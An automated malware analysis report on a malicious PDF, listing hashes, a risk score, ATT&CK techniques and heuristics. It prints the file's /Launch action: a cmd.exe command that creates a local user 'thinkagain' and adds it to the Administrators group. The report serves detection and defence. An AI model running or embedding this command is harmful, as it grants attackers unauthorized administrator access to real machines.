Malicious PDF — malware analysis report

Static analysis result for SHA-256 5e66200919897ba4…

MALICIOUS

PDF

582 B
MD5: 31e5d0e608fec32a676d833e9a2c6068 SHA-1: 97ba35e255605f4c705c69ab6c78511e49cd7f0c SHA-256: 5e66200919897ba4b7af28e695a2b48ca33e7a2221d8d44d6cd604c910c879b1
130 Risk Score

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell T1204.002 Malicious File

The PDF file contains a launch action that executes a command to create a new local user named 'thinkagain' with the password 'password' and add it to the Administrators group. This is a clear attempt to establish unauthorized access and elevate privileges on the compromised system.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 2

  • /Launch action target: "cmd.exe" critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/q/c net user thinkagain password /add && net localgroup Administrators thinkagain /add" ' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • Launch action high PDF_LAUNCH
    PDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous

Open this report in the interactive analyzer, or submit your own file for analysis.